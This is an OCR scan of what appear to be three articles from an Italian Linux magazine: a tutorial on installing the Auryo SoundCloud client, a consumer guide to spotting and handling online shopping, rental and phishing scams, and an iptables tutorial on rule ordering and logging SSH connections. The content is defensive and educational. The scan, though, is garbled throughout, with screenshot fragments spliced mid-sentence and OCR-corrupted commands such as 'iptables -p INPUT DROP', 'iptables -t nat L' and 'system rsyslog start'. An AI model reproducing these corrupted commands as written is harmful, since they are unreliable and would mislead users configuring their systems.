Lanciamo quindi ilcomando sudo dpkg -i Auryo_1.4.2_amdé4. 
deb, confermiamo con la password di amministrazione e at- 
tendiamo la fine del setup. 


£Y auryo 
| 


Al termine del setup, non ci resta che avviare Auryo 

{dopo averlo ricercato dall'elenco dei software in- 
stallati) per verificare che tutto sia andato secondo i piani. Ap- 
pare dunque una scarna (inizialmente) interfaccia grafica dalla 
quale cliccare sul pulsante Login. 


VA Non sono un robot (> 


© lagree to the Terms ot Use and Privacy Policy 


«a NUOVOACCOUNT 
0 Subito dopo aver cliccato sul pulsante Login, si 
‘apre una nuova scheda di SoundCloud nel browser 
predefinito di sistema. Se non disponiamo già di un account, 
clicchiamo su Create account e compiliamo tutti i campi pre- 
senti. Confermiamo con Create account. 


Search. results'for: rock 
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Twinkle Twinkie 
Little Rock Star 


Preston and Steve 
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{1} . Possiamo quindi ritornare all'interfaccia grafica di 

Auryo e chiudere il browser Web. Dal campo di ri- 
cerca (in alto a sinistra) inseriamo il brano, l'artista o ilgenere 
musicale che vogliamo ricercare. Il risultato viene mostrato 
nella parte a destra dell'interfaccia. 


Auryo 142 


Ueen ACDC Outkast Led 

\@ppelin Prince The Beatles 

Moop & Dre vs. Crowded 
House - Rockin Black 
Jirosunohara 


x (11) 12 Repost BE =, Addto playlist 


@ viewin browser 


‘Me TIPIACE? 


Nel caso in cui avessimo avviato la riproduzione di 


esprimere il nostro apprezzamento (Like) o visualizzare più 
dettagli cliccando su View in browser (presente in alto, accanto 
all'immagine di copertina del disco). 


un intero disco (quindi più tracce musicali) possiamo - 


When were you born? (& i 
È: , 
July 1986 
What is your genderidentity? @? 


Male 


SPUNICIOUA 
TY SOUNOLIioO 


TUTTO PRONTO 
0 Sulla mailbox indicata al passo precedente, rice- 
“——_—’viamo un messaggio con un link: clicchiamolo per 
proseguire con la registrazione. Indichiamo un nickname e 
la nostra data di nascita. Fatto ciò, non ci resta che termina- 
re con un clic su Get started with SoundCloud. 


Snoop & Dre vs. Crowded 
House - Rock In Black 
jirosunohara 


© TT» © 


DO 0 L33.7K 


Related tracks 


Comments (> 


davesimon123 05:32 


» ACDC_ Ron 


ci BRANO IN PLAY 

Ù 0 Per avviare la riproduzione di un brano musicale 
non dobbiamo far altro che cliccare sul pulsante 

Play posto in corrispondenza del brano stesso. Cliccando sui 

3 puntini orizzontali (accanto al titolo del brano] possiamo 

apprezzare la traccia (Like) o condividerlo. 


Tracks Likes 


jitosanohera 03:58 


Queen ACDC Outknst Led, 


‘se e PROFILOSOCIAL 

i 06 . Inaltoa destra dell'interfaccia grafica di Auryo viene 
SETA visualizzato il nostro nome utente (nickname scelto in 
precedenza). Cliccandoci sopra possiamo vedere tutti i dettagli 
del nostro profilo: immagine, followers, following, tracce cari- 
cate e brani piaciuti. 
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onostante i progressi delle 
forze dell’ordine contro la 
cybercriminalità sono stati 


notevoli, i reati on-line rimangono 
un’opportunità particolarmente 
redditizia per chi desidera arricchirsi 
rapidamente senza badare troppo alla 
moralità. Ma mentre in passato ci si 
limitava soprattutto all’hacking delle 
password, ai virus o agli attacchi hacker, 
adesso si è sviluppata una vera e propria 
rete di attività criminali e praticamente 
non esiste portale per lo shopping, siti di 
aste o di compravendita immobiliare, sul 
quale non si trovino truffatori che, con 
subdoli trucchi, cercano di abbindolare 
gli ignari clienti. Oltretutto, secondo 
quanto affermato da chi indaga sul 


IL TRUCCO DELLA MANCATA CONSEGNA 


Una delle tecniche più amate dai farabutti 


In questo caso, il truffatore paga regolarmente tramite PayPal, trasferisce la som- 
ma, poi con la scusa di non essere a casa nei giorni in cui il pacco sarà presumi- 
bilmente consegnato, convince in venditore a consegnare o inviare il pacco ad una 
terza persona, ovviamente ad un indirizzo diverso dal suo e contattandolo telefoni- 
camente, mai tramite email. Se il venditore accetta, scatta la trappola. Il truffatore 
affermerà di non aver mai ricevuto il pacco e aprirà una contestazione su PayPal per 
ottenere il rimborso di quanto pagato. In molti casi, potrebbe surrogare la sua tesi 
con l'aiuto di testimoni. Alla fine, lui avrà merce e denaro, e noi... la cattiva reputa- 
zione di essere uno che non invia la merce venduta. Solo una spedizione assicurata 


potrebbe parzialmente salvarci. 
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TRUFFE ON-LINE: 


PERICOLO 


COSTANTE 


Quello che può apparire come un grande affare, in 
realtà può rivelarsi un tranello di qualche truffatore. 
Quali sono i pericoli che possiamo trovare sul Web 


e come difendersi? 


cybercrimine, le statistiche riflettono 
solo parzialmente le reali dimensioni 
del fenomeno. Il numero dei crimini 
perpetrati on-line sarebbe, difatti, 
di molto superiore rispetto a quelli 
realmente dichiarati. Infatti, chi viene 
truffato spesso non sporge neanche 
denuncia, valutando inutile la cosa 
rispetto alle somme in gioco. Per questo 
è importante essere particolarmente 
attenti quando si è online: vi spieghiamo 
quali sono i nuovi pericoli presenti in 
Rete e come fare per proteggersi. 


CHIUNQUE 
PUO ESSERNE VITTIMA 


Nemmeno le celebrità sono al sicuro 


dalle nuove truffe on-line. Di recente la 


moglie dell’ex calciatore dell’ Arsenal 


Johan Djourou, la signora Emilie, 
ha prenotato una casa per le vacanze 
a Ginevra tramite il noto Airbnb, o 
meglio, così pensava, visto che in 
realtà la prenotazione (e soprattutto il 
pagamento), sono stati “deviati” al di 
fuori del portale. Dopo dieci ore di auto 
da Amburgo alla Svizzera è arrivata la 
brutta sorpresa. Djourou su Instagram 
ha poi postato una frase emblematica: 
“Siamo stati fregati. Il denaro è volato 
via”. Un tipico caso di scippo on-line, 
una cosa che accade praticamente ogni 
giorno e mostra come spesso non si è 
abbastanza accorti quando si è on-line. 
Internet è un paradiso per lo shopping: si 


LA TRUFFA DEI PRODOTTI CONTRAFFATTI 


Prezzo vantaggioso? Ma il prodotto è originale? 


Su shop on-line falsi di solito si arriva tramite la ricerca di Google, attirati 
come falene da offerte da sogno su prodotti di fascia alta. Dopo aver clic- 
cato sul link si entra in uno store realizzato professionalmente, per nulla 
diverso dai negozi reali. Acquistando degli occhiali da sole RayBan per soli 20 


euro, ad esempio, questi arriveranno pochi giorni dopo; peccato che si rice- 
verà soltanto un'economica copia cinese e non l'originale! Se a questo punto 
desideriamo riavere i nostri soldi indietro, scopriremo che sarà impossibile 
contattare il negozio; le e-mail rimarranno senza risposta, i soldi ormai persi 
e la persecuzione legale poco conveniente. 


può trovare un nuovo film in Blu-ray per 
meno di 10 euro, oppure un grandioso 
smartwatch per soli 50, invece che 130. 
Contenti vero? E invece no! Purtroppo 
buona parte degli “affarissimi” che si 
fanno sul Web non sono altro che truffe 
e questo ci fa passare rapidamente dalla 
gioia della contrattazione, all’inferno dei 
problemi. Tutto diventa chiaro quando 
il prodotto acquistato non arriva: siamo 
caduti nella truffa dei fake-shop, ovvero 
falsi negozi. 


NEGOZI OVUNQUE! 


Le truffe perpetrate tramite falsi negozi 
è in forte espansione e spesso non è 
così facile intuire la frode, anche perché 
i cyber-criminali riescono a ricreare 
pagine Web che sembrano dei negozi 
normali. Il loro unico scopo, però, è 
rubare. Spesso le vittime si imbattono 
in essi addirittura tramite i risultati di 
ricerca di Google o su siti di annunci 
su Internet. Solitamente, i prezzi sono 
molto allettanti, e spesso sono presenti 
solo feedback positivi da parte di 
(presunti) clienti. Solo i professionisti 
riescono a riconoscere le pagine create 
dai truffatori: spesso mancano le 
informazioni legali o i dati forniti sono 
fittizi. Se paghiamo, non riusciremo mai 
più a rivedere i nostri soldi o ad ottenere 
le merci, magari ordinate in Cina. 


TRUFFE SU AMAZON... 


Cosa fare per difendersi? Non acquistare 
più su Amazon e simili? No, certo, ma 
bisogna comunque stare dannatamente 
attenti! Il gigante degli acquisti on-line, 


di per sé, è affidabilissimo, ma non si 
può dire la stessa cosa per tutti gli altri 
fornitori presenti sul suo marketplace. 
Oltre a molti rinomati venditori, sulla 
piattaforma sono purtroppo presenti 
anche dei truffatori, soprattutto nel 
settore dei prodotti tecnologici e questo 
nonostante i controlli di Amazon sui 
propri utenti siano diventati più stringenti 
rispetto al passato. Come si riconoscono 
le truffe, e cosa fare se si è caduti vittima 
di un raggiro? Scopriamolo subito. 


«E ANCHE 
QUELLE IMMOBILIARI 


La situazione della ricerca degli 
alloggi è critica in molte grandi città: 
da un lato, la domanda di abitazioni 
è enorme, dall’altro l’offerta è scarsa. 
Questa situazione sta attirando sempre 
più truffatori alla ricerca di vittime, 
che vengono “intrappolate” non solo 
utilizzando i metodi tradizionali, 
ossia annunci su quotidiani, mercatini 
o volantini pubblicitari, ma anche 
concentrandosi su portali Internet come 
Idealista, case24 e via discorrendo. Le 
offerte fraudolente sono praticamente 
indistinguibili da quelle reali. Solo 
il prezzo è quasi sempre l’elemento 
discriminante tra le due, visto che di 
solito è bassissimo, così da attrarre più 
vittime possibili con un singolo annuncio 
falso. E occhio anche ai portali per le case 
vacanza come Airbnb, perché i truffatori 
stanno iniziando a colpire anche qui. Gli 
inquirenti ritengono che i truffatori stiano 
diventando sempre più sfacciati, visto che 
le truffe nel settore immobiliare stanno 
velocemente lievitando per numero ed 
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entità delle somme estorte. Purtroppo 
per i consumatori truffati la possibilità 
di recuperare il denaro perso è prossima 
allo zero, così come è praticamente nulla 
la prospettiva di mandare dietro le sbarre 
questi criminali. 


ANCHE SUI PORTALI 
AUTOMOBILISTICI 


Truffe simili vengono applicate dai 
cyber-criminali anche al settore delle 
auto usate. Si parte sempre da un 
modello molto richiesto, offerto ad un 
prezzo allettante. Al momento della 
richiesta di visione dell’auto, però, si 
scopre che questa è all’estero. Pazienza, 
il problema su può superare: in caso 

di acquisto occorre pagare in anticipo 
solo il costo del trasporto. Il resto dovrà 
essere versato soltanto al momento del 
ricevimento dell’auto. Ovviamente chi 
cade vittima della truffa scoprirà ben 
presto che l’auto non arriverà mai. E 
ovviamente, che i soldi versati sono 
ormai persi. Un altro modo per truffare 
gli utenti è quello di fornire numeri di 
telefoni con sovrapprezzo, cosicché 
quando li si contatta il proprio credito 
telefonico viene velocemente svuotato. 


IL TRIANGOLO NO! 


Abbiamo oggetti dei quali ci vogliamo 
sbarazzare? Oppure cerchiamo qualche 
affare o qualche oggetto esotico, ma non 
abbiamo voglia di girare per,mercatini 
nei piovosi week-end invernali? 
Probabilmente eBay è la soluzione ideale. 
Da anni, tuttavia, su questa piattaforma 
non si trovano solo acquirenti e venditori 
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ATTENTI AL PHISHING! 


Controiliamo bene le e-mail 


È una vecchia truffa rispolverata. 
Utenti di portali immobiliari o di 
vendite auto ricevono la richiesta di 
aggiornamento datitramite e-mailo 
SMS all’interno dei quali è presente 
un link che, ovviamente, non riman- 
da al sito ufficiale nel quale inserire 
i dati, ma ad una pagina realizzata 
ad arte per carpire username, pas- 
sword e altri dati. Questa truffa può 
essere utilizzata per propinarci in 
seguito altri tipi di frodi 


onesti, ma anche molti truffatori. Frodi 

a triangolazione, scambio di oggetti 
e altro ancora: su eBay si può trovare 
un’incredibile varietà di tentativi di 
frode, dei quali possono essere vittima 
sia gli acquirenti che i venditori, con il 
vantaggio che gli acquirenti possono 
usufruire della protezione vendite di 

eBay. Nel corso degli ultimi anni la 
piattaforma è diventata molto più sicura 
che non in passato; buona parte del merito 
è della società controllata PayPal e dei 
relativi servizi di pagamento. Ma anche 
i truffatori non sono rimasti a guardare 
e oltre alle truffe che elenchiamo qui, 

sul portale ne sono presenti molte altre. 

Ad esempio, dovremmo sospettare dei 

venditori che utilizzano immagini prese 
dal sito del produttore dell’oggetto per 
le proprie aste. Infine, nonostante le 
controversie sulla piattaforma d’asta 
siano più frequenti che in passato, 
queste non sempre sono frodi o derivano 
da cattive intenzioni. Se non siamo 
soddisfatti della qualità di un articolo 
o un compratore ha semplicemente 
dimenticato di pagare, infatti, spesso un_ 
semplice messaggio risolve il problema. 


è 


CALL CENTER ; 
MOLTO BEN ADDESTRATI 


Le telefonate da parte di un presunto 
call center (che poi non si rivela tale) 
sono abbastanza semplici da sgamare, 
considerato che solitamente chi chiama 
si esprime in un inglese maccheronico 
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e dal forte accento straniero. Questo 
ha permesso di limitare fortemente 
i danni. Più pericolosi sono i siti sui 
quali appaiono popup fraudolenti che 
avvertono l’utente, ad esempio, della 
presenza di un pericoloso virus sul 
proprio disco rigido. In questi casi 
capita che l’utente venga invitato a 
telefonare ad una fasulla assistenza 
tecnica per ricevere aiuto. L'obiettivo? 
Prendere il controllo completo del PC. 
Se questi truffatori riescono a far cadere 
nel tranello una vittima, procedono 
secondo uno schema ben collaudato e 
volto a cercare di convincere le vittime 
a scaricare un software di manutenzione 
remota. Attraverso questo, i criminali 
installano un programma di spionaggio, 
che consente l’accesso completo al 
computer della vittima e permette loro 
di prelevare senza problemi le password 
memorizzare e qualunque altro dato che 
possa essere utile per i criminali. Certo, 
tale tecnica è più frequente su sistemi 
operativi proprietari come Microsoft 
Windows, ma non pensiamo che GNU/ 
Linux sia esente. Fortunatamente, 
in Italia questo tipo di truffa non ha 
attecchito più di tanto, probabilmente 
perché vi sono intuibili difficoltà legate 
alla lingua (solitamente i truffatori non 
utilizzano l’italiano, ma l’inglese per 
comunicare). Le truffe arrivano anche (o 
forse sarebbe meglio dire soprattutto”) 
via posta elettronica e sono tante e ben 
congegnate. Nel corso degli ultimi 
anni sono molte le truffe succedutesi. 
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Notissima, ad esempio, è la cosiddetta 
“truffa nigeriana”, nella quale persone 
che vendevano oggetti di valore su 
Internet si sono viste recapitare email da 
parte di un fantomatico compratore della 
Costa d’ Avorio, interessato ai loro oggetti 
e disposto a fare un bonifico immediato 
per l’acquisto degli stessi. Peccato che 
per sbloccare questo bonifico occorre 
versare dei soldi (che lui non ha) tramite 
Western Union o MoneyGram. Inutile 
dire che è tutto falso e che una volta 
pagato avremo perso definitivamente 
quei soldi. 


AGENZIA DELLE 
ENTRATE 0 AVVOCATI? 


Recentissima (estate del 2017) è una truffa 
segnalata anche sul sito dell’ Agenzia 
delle Entrate. Sono tantissimi, difatti, 
gli utenti che si sono visti recapitare un 
messaggio di posta elettronica nel quale 
si chiede l’attivazione di una procedura 
per il rimborso di somme versate al fisco, 
un modulo per il rimborso parziale del 
canone TV, oppure di regolarizzare la 
propria posizione fiscale. Peccato che 
il link contenuto nell’email, una volta 
cliccato, avvii il download di un virus 
(fortunatamente pernoi, solo su Windows). 
Clamoroso, infine, il caso dell’email 
contenente una presunta diffida relativa ad 
attività diffamatorie avviate su Facebook. 
Nell’e-mail, scritta in un italiano corretto, 
è presente anche l’intestazione di un noto 
studio legale, realmente esistente, che si 


“a ° 
genzia 
a» Ntrate st 
L'Agenzia Il tuo profilo fiscale 
TI trovi In: Home - Servizi online - Servizi fiscali - Servizi fiscali senza registrazione - Servizio di verifica della partita Iva - Verifica della partita Iva 


Verifica partita Iva 


Inserire la partita Iva che si intende verificare. Se è correttamente registrata In Anagrafe tributaria, viene 
visualizzato un messaggio di risposta che riporta: 


| Link correlati 


4 lo stato - attiva, sospesa (in caso di affitto d'azienda), cessata 


+ la denominazione o il cognome e nome del titolare 4 Controllo partite Iva comur 
(VIES) 


4 la data di inizio attività e le eventuali date di sospensione/cessazione 
4 Verifica codice fiscale 


Tec 


«mei cme» 


Codice di sicurezza: 


® Fig. 1° Il sito Web ufficiale dell'Agenzia delle Entrate permette di verificare 
la reale esistenza e l'intestazione di qualsiasi partita IVA italiana 


è visto tempestare il telefono da richieste 
di chiarimenti: una situazione per certi 
versi comica ma che si è effettivamente 
verificata. 


NON PAGARE. 
LA MIGLIOR DIFESA 


Queste truffe non sono nuove, ma 
spesso tendono a ripetersi ciclicamente. 
In questi casi dobbiamo restare calmi 
e riflettere prima di rispondere a una 
qualunque email inattesa, soprattutto se 
in questo messaggio ci sono richieste 
di pagamento o offerte di soldi. 
Effettuiamo un’accurata ricerca sul 
Web e verifichiamo ogni particolare. Se 
scopriamo che è una truffa, segnaliamo il 
tutto alla Polizia Postale. 


DIFENDITI COSÌ 


Le 6 dritte per stare alla larga da potenziali truffe 


Di solito i falsi negozi allettano l'utente con prezzi 

ultra-economici su prodotti di marca. Non di rado i 
prezzi dei prodotti “in offerta” possono essere dal 30 al 70% 
inferiori rispetto ai consueti prezzi di mercato. Confrontiamo il 
prezzo offerto con un motore di ricerca di prezzi come Google 
Shopping o Trovaprezzi.it. Se anche i prezzi dei rivenditori In- 
ternet più economici sono significativamente più elevati, allora 
qualcosa non va. 


Ga VERIFICHIAMO SEMPRE | PREZZI 


Se abbiamo qualche dubbio, verifichiamo le informa- 

zioni sul venditore contenute generalmente nelle info 
o nei contatti del'e-shop {diamo un'occhiata al menu presente 
quasi sempre nel footer della pagina Web). Nel migliore dei casi 
dovremmo trovare informazioni come la partita IVA, l'indirizzo 
della sede e almeno un numero di telefono e di fax da utilizzare 
per l'assistenza all'acquisto. Controlliamo queste informazioni: 
ad esempio, facciamo una ricerca su Google Maps per scopri- 
re se una società con quel nome è effettivamente disponibile 
all'indirizzo indicato. Inoltre controlliamo il numero di partita 
IVA sul sito dell'Agenzia delle Entrate e, facciamo un colpo di 
telefono al numero indicato. 


RECENSIONI 
Sono disponibili soltanto recensioni positive e queste 


sono relativamente poche? Potrebbe essere un cam- 
panello di allarme. Capita spesso che vengano inserite false re- 
censioni positive per mettere in buona luce ilvenditore e ingan- 
nare l'acquirente, per lo meno non esperto di acquisti on-line. 


Si CONTROLLIAMO IL VENDITORE 


OCCHIO ALLE ETICHETTE 
Su Amazon (non solo nella sua versione italiana, ma 


anche su quelle estere), se troviamo molte recen- 
sioni positive verifichiamo che siano inserite da persone che 
hanno effettivamente acquistato quell'oggetto. Lo si può capire 
dall'etichetta “Acquisto verificato” che si trova accanto all’in- 
testazione della recensione. Su eBay per acquisti di una certa 
importanza preferiamo i venditori marcati come “Venditori af- 
fidabilità top”. 


Cerchiamo di rimediare al più presto possibile. Se 

abbiamo pagato tramite bonifico e questo non è stato 
accreditato sul conto del venditore, possiamo annullare il 
trasferimento contattando la nostra banca. Se il pagamento è 
avvenuto tramite cara di credito possiamo opporvi all'addebito, 
ma anche in questo caso, occorre verificare la fattibilità con la 
propria banca perché le regole variano da istituto a istituto. 
Inoltre, se siamo vittima di una frode, dovremmo presentare 
immediatamente una denuncia alla Polizia Postale, un'azione 
che può rivelarsi determinante anche per ottenere il rimborso. 
Catturiamo anche degli screenshot del sito che ci ha truffato e 
conserviamo le email e tutte le conversazioni avute con loro. 


OPZIONI DI PAGAMENTO 
I fake shop non offrono metodi di pagamento sicuri 


come PayPal. Di solito, però, è disponibile d'acquisto 
tramite carta di credito. Se viene offerto un servizio di trasferi- 
mento di denaro come Western Union è meglio essere sempre 
sospettosi. Prima regola: stare attenti... 
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1 giorno d’oggi una PMI (Piccola e Media Impresa), 

non può più esimersi dall’avere al proprio interno 

un collegamento alla grande rete attraverso il 

quale fornire servizi propri o accederne a specifici 
come PEC, SPID e in genere tutti quelli della pubblica 
amministrazione. In questi casi al fine di definire politiche di 
gestione d’accesso per comunicazioni provenienti dall’esterno 
verso l’interno (da Internet alla LAN, ad esempio in una DMZ) 
e anche per regolamentare, a livello di rete, il traffico diretto 
verso l’esterno, non ci si può non affidare a un firewall. 


COME FUNZIONA UN FIREWALL? 


Sul concetto di firewall abbiamo già speso qualche articolo 
nei numeri precedenti. Va da sé che un argomento vastissimo 
come questo non va a braccetto con gli evidenti limiti di spazio 
presenti in una rivista. Non è nemmeno pensabile, però, occupare 
decine di numeri per un solo argomento perché ciò andrebbe 
a discapito di quei lettori non interessati a questo specifico 
argomento. Oltretutto questo non è nemmeno l’obiettivo di 
una rivista ma dare, attraverso qualche applicazione pratica, 
un approccio che possa far inquadrare il sistema prima nel suo 
complesso e fin dove possibile nel particolare degli elementi 
che lo compongono. Premesso ciò, riassumiamo qualche passo 
già scritto. I firewall possono dividersi in due categorie: packet 
filtering e proxy firewall. Nella catena ISO/OSI il primo arriva 
fino al livello Trasporto mentre il secondo riguarda anche il 
livello Applicazione. Il firewall a corredo di GNU/Linux, quello 
di cui ci stiamo occupando e di fatto implementato nel kernel 
Linux, è il packet filtering così definito poiché va a monitorare 
ogni singolo pacchetto che entra e/o esce dalle interfacce di rete 
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UN MURO 
PER CONTRASTARE 
| OGNI ATTACCO 


iptables è il firewall predefinito di Linux. Quali sono 
le regole che ci permettono di filtrare il traffico di rete 
e limitare gli attacchi più comuni? Scopriamolo subito! 


NON SOLO “FILTER” 
Le altre catene e tabelle 


Il comando iptables -L elenca lo stato delle tabelle filter nel- 
le tre catene di appartenenza INPUT, OUTPUT e FORWARD e 
ciò perché di default iptables assume implicitamente l’op- 
zione -t filter, quando non specificata. Al fine di visualiz- 
zare la policy delle altre catene e le regole presenti nelle 
altre tabelle possiamo utilizzare l'opzione -t specificando 
la tabella di interesse. Ad esempio, iptables -t nat L elenca 
lo stato delle tabelle di nat nelle catene di appartenenza. 
Idem per le tabelle mangle e raw con le funzioni oramai 
note nel loro ambito di utilizzo. L'aggiunta dell'opzione -v 
ci permette di elencare anche i pacchetti accettati, rifiuta- 
ti etc. Va da sé che per poter, ad esempio, cancellare una 
regola nella tabella nat della catena di POSTROUTING è suf- 
ficiente impartire, più in generale, il comando iptables -t nat 
-D NOME_CATENA N°Regola laddove la numero 1 è la prima 
dall'alto visualizzata con i comandi precedenti. 


(eth0, enp3s0, ppp0O, ecc) valutando o meno la possibilità di 
accettazione in funzione di parametri come l’indirizzo sorgente 
e/o destinazione, numero di porta, interfacce di ingresso/uscita, 
ecc. Senza riportare le medesime immagini in articoli diversi, 
è sufficiente aprire con un qualsiasi visualizzatore di immagini 
il file PacketFiltering.png nel quale è possibile vedere i 
parametri principali presi in considerazione dal packet filtering 
per il filtraggio dei pacchetti di rete. Il metodo di filtraggio è 
ottenuto utilizzando specifiche regole in opportune tabelle e in 
determinate catene di flusso. 

Possiamo aprire l’immagine Tabelle.png in allegato 
(www.edmaster.it/url/7193) per visualizzare, anche mentalmente 
dopo aver fatto un po’ di pratica, i possibili percorsi dei pacchetti 
seguendo le frecce per i percorsi ingresso-uscita. Abbiamo 
iniziato con uno scenario relativamente semplice: un Raspberry 
Pi con funzioni di firewall e DHCP server, equipaggiato con 
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tre interfacce di rete per zona DMZ, rete LAN e uscita verso 
il router con il quale è stata creata la WAN. Di questo scenario 
ne abbiamo fatto uno script con un numero di regole minimali 
da adattare a seconda delle proprie esigenze, sicuramente non 
completo poiché manca di protezioni da attacchi interni e esterni 
che vedremo nel seguito. Se però vogliamo andare avanti e 
pensare ad una protezione più specifica per target più complessi 
occorre aggiungere altre conoscenze a quelle fin qui acquisite. 


RISPETTIAMO LE PRECEDENZE 


Di default la policy delle catene nel firewall Linux, a meno di 
considerare distribuzioni dedicate alla sicurezza, sono impostate 
su ACCEPT. Nei confronti della sicurezza la miglior policy è 
quella che vede le catene in DROP la quale nega l’accesso a tutto 
ciò che non viene esplicitamente permesso. Allora impostare, ad 
esempio, una regola del tipo iptables -p INPUT DROP di fatto 
significa bloccare tutto il traffico in ingresso al nostro host. 
Premesso questo ipotizziamo uno scenario (Fig. 1) di rete LAN 
con uno switch ovvero, lo ricordiamo, dispositivo che permette 
di connettere due segmenti di una stessa rete o diversi sistemi 


di rete. In genere non è lo scenario in se a caratterizzare la 
difficoltà di applicazione del firewall, ma quanto le policy e le 
regole da adottare in funzione dell’obiettivo da ottenere. Infatti, 
è sempre possibile suddividere il sistema complessivo in piccole 
celle appartenenti ad una sotto-rete e ragionare su quella sezione 
per poi spostarsi su sotto-reti adiacenti. Ipotizziamo che siano 
stati assegnati staticamente gli indirizzi IP e ipotizziamo che 
un host di questa rete debba rifiutare, per motivi di sicurezza, 
connessioni SSH da qualsiasi altro host in LAN o esterno che 
sia. La connessione SSH -— di fatto un protocollo — fa uso del 
protocollo TCP per l'autenticazione, lo scambio delle chiavi, la 
cifratura, la compressione e il controllo d'integrità dei pacchetti: 
il demone/server è in ascolto sulla sulla porta standard 22 (fare 
riferimento al file /ete/services per l'associazione Servizio- 
porta/protocollo). 

Assicuriamoci di aver avviato il demone SSH sull’host che 
dovrà assumere funzioni di server SSH nel qual caso dovremo 
avviarlo con il comando service sshd start. A questo punto se da 
un client della rete provassimo a collegarci all’SSH server con 
ssh Indirizzo_IP ci verrà chiesta l'autenticazione alla macchina 
e potremo così avere accesso a essa. Ma se sulla macchina dove 
è in esecuzione il demone SSH impartiamo il comando: 


Segmento di rete 192.168.0.0/24 


Gateway/Router 


P: 192.168.0.2 


Fig. 1 e Ecco la sotto-rete in esame 
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DIARIO DI BORDO 


I log, una risorsa di grande valore! 


IL syslog è un servizio utilizzato dai demoni che girano in 
background e dallo stesso kernel per registrare messaggi. Si 
parla infatti di log quando si fa riferimento alla registrazione di 
eventi che accadono in una macchina e il syslog è un software 
che serve a tenere una sorta di giornale di bordo di quanto avvie- 
ne nel sistema. Da una server farm fino alla nostra piccola rete 
di casa potrebbe essere necessario registrare cosa accade nel 
nostro sistema eventualmente utilizzando una macchina sepa- 
rata, ad esempio un Raspberry per limitare i consumi elettrici. 
In buona parte delle distribuzioni di default viene utilizzato il sof- 
tware Rsyslog (www.rsyslog.com). Per poter essere certi che i 
messaggi inviati dal kernel vengano memorizzati assicuriamoci 
che il servizio sia attivo con service rsyslog status. Se nell'output 
c'è la voce active (running) allora è attivo e avviato altrimenti do- 
vremo avviarlo con system rsyslog start. Il file di configurazione 
che consente di controllare cosa viene registrato ed in quale mo- 
dalità è /etc/rsyslog.conf nella cui sezione RULES vengono indicati 
i percorsi dove vengono salvati i messaggi in funzione del tipo e 
delle priorità. 


iptables -A INPUT -p tcp -s 0/0 --dport 22 -j DROP 


se da un qualsiasi host della rete ora provassimo a collegarci al 
server SSH non ci verrà restituito il prompt per l'autenticazione, 
semplicemente perché il firewall dove sta girando il demone 
SSH rigetta le richieste TCP sulla porta 22 provenienti da 
qualsiasi indirizzo sorgente. Proviamo ora a dare il permesso a 
solo un host della rete cambiando la regola nel modo che segue: 


iptables -A INPUT -p tcp -s 192.168.0.2 --dport 22 
-j ACCEPT 


Collegandoci al server SSH dall’host che ha il semaforo 
verde comunque impossibilitati 
nell’autenticazione! Perché? Elencando le regole della catena di 
INPUT con iptables -L INPUT -n troveremo un output del tipo: 


noteremo che saremo 


Chain INPUT (policy ACCEPT) 


target prot opt source destination 
DROP tcp -- anywhere anywhere tep 
dpt:ssh 

ACCEPT tcp, -- 192.168.0.2 anywhere tcp 
dpt:ssh 


Si nota nulla di strano? È semplicemente sbagliato l’ordine 
delle regole! Infatti la prima (DROP) prevarrà su tutte le altre 
presenti, infatti il firewall rigettando tutte le connessioni da 
qualsiasi indirizzo allora alla seconda regola non ci arriverà 
mai! Ma se le invertiamo, portando la seconda al primo posto, 
i pacchetti che soddisfano la prima regola riescono a passare e 
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per quelli che non dovessero soddisfarla il firewall passa alla 
successiva che avendo la policy DROP rigetterà la connessione. 
Per avere le regole nella giusta sequenza cancelliamo la seconda 
con iptables -D INPUT 2 e riscriviamola mettendola in testa 
utilizzando l’opzione -I in luogo di -A che invece la accoda 
a quelle presenti. Possiamo verificare che ora la connessione 
dall’host con l’indirizzo permesso funziona, ma è bloccata 
dagli host con indirizzo differente. Nella regola si è riportato un 
indirizzo specifico perché abbiamo ipotizzato indirizzi assegnati 
staticamente. Qualora volessimo accettare le connessioni da 
una intera sotto-rete potremo riportare l’indirizzo in formato 
CIDR (Classless Inter-Domain Routing), ad esempio -s 
192.168.0.0/24 nel quale il numero dopo lo slash indica il 
numero di bit riservati alla rete. Nello specifico identifica una 
netmask pari a 255.255.255.0, con 256 possibili indirizzi - di cui 
254 di host - da 192.168.0.0 (indirizzo di rete) a 192.168.0.255 
(indirizzo di broadcast). 


E IO TI REGISTRO! 


La propedeuticità delle regole riportata nel precedente paragrafo 
ci da il “La” per introdurre una nuova e intelligente funzione di 
iptables: la capacità di poter registrare le connessioni al fine di 
verificare, in qualsiasi momento, chi ha richiesto cosa. Questa 
caratteristica permette all’amministratore di sistema di attivare 
operazioni di logging — registrazione sequenziale e cronologica 
degli accessi alla macchina - e auditing — valutazione pianificata 
e revisione delle regole al fine di verificarne la correttezza e 
modificarle in funzione dei nuovi servizi offerti o rimossi 
dalla rete in essere - degli eventi succedutisi nel tempo. Per 
ottenere un tale risultato si agisce su due fronti: sul firewall e 
sull’attivazione di un software di registrazione dei file di log. In 
iptables per attivare il logging del traffico si utilizza l’azione “-j 
LOG”. Vediamo subito un’applicazione pratica con la rete dello 
scenario precedente affinché tutti gli interessati possano mettere 
in pratica il risultato. Rimuoviamo la seconda regola utilizzando 
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Fig. 2 e In alto le regole impostate, in basso i messaggi di 
log di iptables 


l’opzione -D di iptables così come visto in precedenza. 
Rimarremo solo con la policy di default ACCEPT per la catena 
di INPUT ma di DROP per le connessioni SSH. L'obiettivo è 
registrare tutte le connessioni via SSH che avvengono sull’host 
aggiungendo una regola ad-hoc. 

Va da sé, per quanto detto poco fa, che tale regola dovrà 
precedere la regola di DROP altrimenti non registreremo nulla 
nei file di log, per questo motivo aggiungeremo la regola, 
all’unica presente, utilizzando l’opzione -I nel modo che segue: 


iptables -I INPUT -p tcp -s 0/0 --dport 22 -j LOG 
--log-level info --log-prefix “Connessioni SSH: ” 


Nell’azione di LOG è stata indicata l’opzione --log-level con la 
quale si definisce il livello di priorità dei messaggi mentre con 
--log-prefix si indica cosa deve essere anteposto al messaggio 
prima che il reale contenuto venga scritto, in questo modo è 
possibile identificare più facilmente il traffico di interesse 
andando a cercare il messaggio personale anteposto. A questo 
punto proviamo una connessione da qualsiasi host, ovviamente 
verrà negata, ma se provassimo a impartire il comando dmesg al 
termine della lista troveremo il log delle connessioni registrati 
da iptables (Fig. 2) caratterizzati da una miniera di informazioni 
come interfaccia d’ingresso, i MAC address, IP sorgente 
e destinazione, protocollo, il numero di porta sorgente e 
destinazione. Per visualizzare il file di log è possibile utilizzare 
anche il comando journalctl -k -f laddove la prima opzione 
